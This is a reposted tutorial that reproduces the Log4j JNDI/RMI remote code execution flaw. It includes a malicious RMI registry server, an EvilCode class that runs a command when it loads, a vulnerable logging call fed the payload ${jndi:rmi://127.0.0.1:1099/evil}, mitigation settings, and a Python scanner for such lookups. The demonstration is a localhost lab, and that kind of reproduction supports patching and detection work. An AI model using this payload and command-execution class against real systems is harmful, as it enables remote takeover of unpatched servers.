
Analysis of log4j vulnerabilities caused by Java RMI

2025-01-17 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/02 Report--

This article introduces the analysis of the log4j vulnerability triggered through Java RMI. Many people have questions about this topic in day-to-day work, so the editor consulted a range of materials and put together a simple, easy-to-follow walkthrough. I hope it helps answer those questions. Let's get started.

RMI and JNDI

RMI (Remote Method Invocation) is Java's remote method call mechanism, an application programming interface for implementing remote procedure calls.

JNDI (Java Naming and Directory Interface) is an API that gives developers a common, unified interface for finding and accessing various naming and directory services.

The main relationship between JNDI and RMI is that services registered with RMI can be accessed through the JNDI API. Before we talk about Spring deserialization vulnerabilities, let's take a look at how to invoke RMI-registered services through JNDI.

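Simulated vulnerability reproduction

POM dependencies

    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-web</artifactId>
        <!-- Default logging starter excluded so that Log4j 2 is used instead -->
        <exclusions>
            <exclusion>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-starter-logging</artifactId>
            </exclusion>
        </exclusions>
    </dependency>
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-api</artifactId>
        <version>2.14.0</version>
    </dependency>
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-core</artifactId>
        <version>2.14.0</version>
    </dependency>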

Hacker side

    // RMIServer.java
    import com.sun.jndi.rmi.registry.ReferenceWrapper;
    import lombok.SneakyThrows;

    import javax.naming.NamingException;
    import javax.naming.Reference;
    import java.rmi.AlreadyBoundException;
    import java.rmi.RemoteException;
    import java.rmi.registry.LocateRegistry;
    import java.rmi.registry.Registry;

    /**
     * Build an RMI service that responds with malicious code.
     *
     * Java RMI, that is, remote method call (Remote Method Invocation), is a Java API
     * for implementing remote procedure call (RPC). It can directly transfer serialized
     * Java objects and supports distributed garbage collection. Its implementation
     * depends on the Java Virtual Machine (JVM), so it only supports calls from one JVM
     * to another JVM.
     */
    public class RMIServer {
        @SneakyThrows
        public static void main(String... args) {
            try {
                // Create the remote object registry (Registry) instance on the local host, default port 1099
                LocateRegistry.createRegistry(1099);
                Registry registry = LocateRegistry.getRegistry();
                System.out.println("Create RMI registry on port 1099");
                // The Java object that is returned
                Reference reference = new Reference("bug.EvilCode", "bug.EvilCode", null);
                ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
                // Register the remote object with the RMI registry server and name it "evil"
                registry.bind("evil", referenceWrapper);
            } catch (RemoteException | AlreadyBoundException | NamingException e) {
                e.printStackTrace();
            }
        }
    }

    // EvilCode.java
    package bug; // package implied by the class name "bug.EvilCode" used in RMIServer

    import java.io.BufferedReader;
    import java.io.IOException;
    import java.io.InputStream;
    import java.io.InputStreamReader;

    /**
     * Executes an arbitrary command; here it causes the Windows server to open the calculator.
     */
    public class EvilCode {
        static {
            System.out.println("the victim server will execute the following command line");
            Process p;
            String[] cmd = {"calc"};
            try {
                p = Runtime.getRuntime().exec(cmd);
                InputStream fis = p.getInputStream();
                InputStreamReader isr = new InputStreamReader(fis);
                BufferedReader br = new BufferedReader(isr);
                String line = null;
                while ((line = br.readLine()) != null) {
                    System.out.println(line);
                }
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }

Website side

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    public class Server {
        private static final Logger logger = LogManager.getLogger();

        public static void main(String[] args) {
            String name = "${java:runtime}";
            logger.info("name: {}", name);
            // Simulate submitted data: a constructed string that makes the victim server
            // execute remote code when it prints the log (127.0.0.1 can be used here)
            String username = "${jndi:rmi://127.0.0.1:1099/evil}";
            // Print the business log as usual
            logger.error("username: {}", username);
        }
    }

[Emergency remedial measures: choose 1 of 3]

Modify the JVM parameters: -Dlog4j2.formatMsgNoLookups=true

Modify the configuration: log4j2.formatMsgNoLookups=True

Set the system environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true
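
As an added example (not part of the original article), the following Python scans request or log lines for the `${jndi:...}` lookup form used in the website-side demo and breaks each hit into scheme, host, port and bound name, so that lookups pointing off-host stand out. The sample lines, the function names and the documentation address 192.0.2.10 are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# The lookup form used in the article's demo: ${jndi:<url>}
JNDI_LOOKUP = re.compile(r"\$\{jndi:([^}\s]+)\}", re.IGNORECASE)
LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def find_jndi_lookups(line):
    """Return one dict per ${jndi:...} lookup found in a single line."""
    findings = []
    for match in JNDI_LOOKUP.finditer(line):
        scheme, host, port, name = None, None, None, ""
        try:
            url = urlsplit(match.group(1))
            scheme, host = url.scheme.lower(), url.hostname
            name = url.path.lstrip("/")
            port = url.port
        except ValueError:  # malformed authority or port: keep the raw hit anyway
            pass
        findings.append({
            "raw": match.group(0),
            "scheme": scheme,
            "host": host,
            "port": port,
            "name": name,
            # Off-host target: the JVM would contact a remote registry
            "external": host is not None and host not in LOOPBACK,
        })
    return findings


def scan(lines):
    """Return (line_number, finding) pairs for every lookup in the lines."""
    return [(number, finding)
            for number, line in enumerate(lines, start=1)
            for finding in find_jndi_lookups(line)]


# Constructed sample lines; 192.0.2.10 is a documentation-only address.
SAMPLE_LOG = [
    "INFO  name: ${java:runtime}",
    "ERROR username: ${jndi:rmi://127.0.0.1:1099/evil}",
    "ERROR username: ${jndi:rmi://192.0.2.10:1099/evil}",
]

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(number, finding)
```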

At this point, the study on "Analysis of log4j vulnerabilities caused by Java RMI" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!
